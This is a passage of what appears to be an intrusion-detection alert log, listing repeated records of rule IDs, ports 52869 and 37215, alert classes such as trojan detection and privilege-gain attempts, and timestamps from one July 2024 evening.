                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.443569
                      SID:2027339
                      Source Port:51794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.412130
                      SID:2829579
                      Source Port:50328
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.787869
                      SID:2025132
                      Source Port:47004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:38.067768
                      SID:2027339
                      Source Port:44970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.827265
                      SID:2027339
                      Source Port:48852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.288760
                      SID:2025132
                      Source Port:34158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.273031
                      SID:2027339
                      Source Port:48642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2835222
                      Source Port:48564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.164569
                      SID:2027339
                      Source Port:51554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.084045
                      SID:2025132
                      Source Port:43120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.528818
                      SID:2831300
                      Source Port:56542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.269499
                      SID:2831300
                      Source Port:33120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.457748
                      SID:2831300
                      Source Port:55328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.037561
                      SID:2027339
                      Source Port:53274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.018794
                      SID:2027339
                      Source Port:46120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.216907
                      SID:2831300
                      Source Port:41080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.607400
                      SID:2027339
                      Source Port:33000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.777436
                      SID:2835222
                      Source Port:54380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.480465
                      SID:2025132
                      Source Port:57578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.119232
                      SID:2831300
                      Source Port:51314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.698150
                      SID:2027339
                      Source Port:52916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.853581
                      SID:2027339
                      Source Port:52256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.496382
                      SID:2027339
                      Source Port:34594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.444876
                      SID:2831300
                      Source Port:46558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.338625
                      SID:2027339
                      Source Port:39432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.098403
                      SID:2025132
                      Source Port:56168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.714340
                      SID:2027339
                      Source Port:60194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.974244
                      SID:2027339
                      Source Port:50146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.586481
                      SID:2027339
                      Source Port:33872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.625708
                      SID:2829579
                      Source Port:41154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.441698
                      SID:2025132
                      Source Port:50284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.343632
                      SID:2835222
                      Source Port:46668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.361832
                      SID:2025132
                      Source Port:39726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.600216
                      SID:2829579
                      Source Port:33654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.097390
                      SID:2027339
                      Source Port:41728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.893173
                      SID:2027339
                      Source Port:58466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.468009
                      SID:2829579
                      Source Port:48518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.614129
                      SID:2027339
                      Source Port:55124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.440618
                      SID:2027339
                      Source Port:46778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.502937
                      SID:2027339
                      Source Port:56304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.180750
                      SID:2025132
                      Source Port:48004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.549791
                      SID:2831300
                      Source Port:50722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.137665
                      SID:2027339
                      Source Port:45060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.816478
                      SID:2027339
                      Source Port:34202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.549030
                      SID:2831300
                      Source Port:49544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.582471
                      SID:2025132
                      Source Port:53726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.554753
                      SID:2831300
                      Source Port:52726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.465756
                      SID:2025132
                      Source Port:33730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:27.692046
                      SID:2025132
                      Source Port:53780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.344189
                      SID:2027339
                      Source Port:41674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.397411
                      SID:2025132
                      Source Port:50404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.454514
                      SID:2025132
                      Source Port:57016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.038244
                      SID:2835222
                      Source Port:39564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.244191
                      SID:2025132
                      Source Port:54764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.736604
                      SID:2027339
                      Source Port:48500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.544809
                      SID:2027339
                      Source Port:36902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.466707
                      SID:2027339
                      Source Port:48832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.834336
                      SID:2027339
                      Source Port:53112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.489725
                      SID:2027339
                      Source Port:47208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2829579
                      Source Port:52650
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.098635
                      SID:2025132
                      Source Port:43190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.575244
                      SID:2831300
                      Source Port:47740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:37.787409
                      SID:2027339
                      Source Port:59748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.467103
                      SID:2025132
                      Source Port:34574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.862992
                      SID:2835222
                      Source Port:43320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.391346
                      SID:2027339
                      Source Port:35332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.549030
                      SID:2831300
                      Source Port:55700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.774187
                      SID:2025132
                      Source Port:41052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:33.760297
                      SID:2027339
                      Source Port:49908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.171719
                      SID:2027339
                      Source Port:55216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.468265
                      SID:2027339
                      Source Port:59048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.086216
                      SID:2829579
                      Source Port:42114
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.729623
                      SID:2027339
                      Source Port:54146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.250934
                      SID:2025132
                      Source Port:55500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2835222
                      Source Port:53318
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.508612
                      SID:2027339
                      Source Port:58034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.940936
                      SID:2027339
                      Source Port:39658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2835222
                      Source Port:36764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.423413
                      SID:2831300
                      Source Port:41084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.111758
                      SID:2027339
                      Source Port:38874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.673677
                      SID:2025132
                      Source Port:51568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.121210
                      SID:2829579
                      Source Port:44812
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.008589
                      SID:2025132
                      Source Port:37108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.495332
                      SID:2027339
                      Source Port:52358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.437168
                      SID:2831300
                      Source Port:50820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:08.490661
                      SID:2831300
                      Source Port:42062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.181584
                      SID:2027339
                      Source Port:58720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.270832
                      SID:2027339
                      Source Port:36350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.135626
                      SID:2835222
                      Source Port:48230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.572816
                      SID:2025132
                      Source Port:52670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:07.844201
                      SID:2027339
                      Source Port:52172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.957923
                      SID:2835222
                      Source Port:49592
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.473848
                      SID:2025132
                      Source Port:33786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:07.493314
                      SID:2027339
                      Source Port:60512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.105578
                      SID:2835222
                      Source Port:57014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.985424
                      SID:2027339
                      Source Port:40672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.446118
                      SID:2831300
                      Source Port:58562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.479091
                      SID:2835222
                      Source Port:43472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325898
                      SID:2835222
                      Source Port:60530
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.052134
                      SID:2025132
                      Source Port:58324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:33.955473
                      SID:2025132
                      Source Port:34284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.182697
                      SID:2027339
                      Source Port:47490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.855567
                      SID:2829579
                      Source Port:56364
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.980733
                      SID:2831300
                      Source Port:37830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.443720
                      SID:2027339
                      Source Port:45270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.589392
                      SID:2831300
                      Source Port:52134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.489725
                      SID:2831300
                      Source Port:36388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.355569
                      SID:2831300
                      Source Port:56674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.238265
                      SID:2829579
                      Source Port:37986
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.620754
                      SID:2835222
                      Source Port:35112
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.531088
                      SID:2027339
                      Source Port:57464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.212855
                      SID:2025132
                      Source Port:46108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.002874
                      SID:2025132
                      Source Port:55508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.088545
                      SID:2835222
                      Source Port:54562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.915135
                      SID:2027339
                      Source Port:38260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.165543
                      SID:2025132
                      Source Port:38202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.482595
                      SID:2027339
                      Source Port:59224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.351053
                      SID:2027339
                      Source Port:34834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.287042
                      SID:2027339
                      Source Port:60154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.179441
                      SID:2831300
                      Source Port:37096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.420371
                      SID:2025132
                      Source Port:46824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.171950
                      SID:2831300
                      Source Port:38242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:24.632253
                      SID:2025132
                      Source Port:49838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.452299
                      SID:2027339
                      Source Port:39614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.454499
                      SID:2027339
                      Source Port:48860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.853068
                      SID:2027339
                      Source Port:34060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.650758
                      SID:2027339
                      Source Port:51018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.736138
                      SID:2831300
                      Source Port:39126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.439868
                      SID:2027339
                      Source Port:57118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2829579
                      Source Port:42002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.471609
                      SID:2831300
                      Source Port:37136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.691312
                      SID:2831300
                      Source Port:44062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.441224
                      SID:2027339
                      Source Port:38538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.544972
                      SID:2831300
                      Source Port:50580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.042861
                      SID:2831300
                      Source Port:37684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.164212
                      SID:2025132
                      Source Port:40334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.025518
                      SID:2027339
                      Source Port:57978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.256029
                      SID:2835222
                      Source Port:49404
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.204945
                      SID:2025132
                      Source Port:52742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.050437
                      SID:2835222
                      Source Port:60818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.205784
                      SID:2027339
                      Source Port:53372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.783693
                      SID:2835222
                      Source Port:50262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.079797
                      SID:2829579
                      Source Port:60800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.362477
                      SID:2027339
                      Source Port:57022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.906796
                      SID:2025132
                      Source Port:58614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.432998
                      SID:2027339
                      Source Port:39584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.712041
                      SID:2025132
                      Source Port:54716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.250288
                      SID:2027339
                      Source Port:33082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.462607
                      SID:2831300
                      Source Port:57864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.503773
                      SID:2831300
                      Source Port:44062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.078168
                      SID:2027339
                      Source Port:42272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.395456
                      SID:2025132
                      Source Port:51154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2829579
                      Source Port:35376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.771763
                      SID:2027339
                      Source Port:54246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.447452
                      SID:2831300
                      Source Port:46372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.748554
                      SID:2835222
                      Source Port:37480
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.038244
                      SID:2835222
                      Source Port:48136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:32.121311
                      SID:2831300
                      Source Port:39564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.540063
                      SID:2027339
                      Source Port:36634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2835222
                      Source Port:49276
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.251823
                      SID:2027339
                      Source Port:54504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.464582
                      SID:2025132
                      Source Port:55284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.122985
                      SID:2831300
                      Source Port:41456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.697115
                      SID:2027339
                      Source Port:35158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.879670
                      SID:2025132
                      Source Port:38410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.058256
                      SID:2835222
                      Source Port:59326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.755462
                      SID:2027339
                      Source Port:46022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.460913
                      SID:2831300
                      Source Port:49234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.488878
                      SID:2831300
                      Source Port:40940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.754581
                      SID:2027339
                      Source Port:50134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.018252
                      SID:2025132
                      Source Port:59512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.024016
                      SID:2025132
                      Source Port:36078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.556779
                      SID:2831300
                      Source Port:41114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.121390
                      SID:2027339
                      Source Port:44654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.501247
                      SID:2835222
                      Source Port:37558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.697720
                      SID:2831300
                      Source Port:39870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.220682
                      SID:2829579
                      Source Port:36122
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2835222
                      Source Port:49950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.307399
                      SID:2027339
                      Source Port:47046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.610819
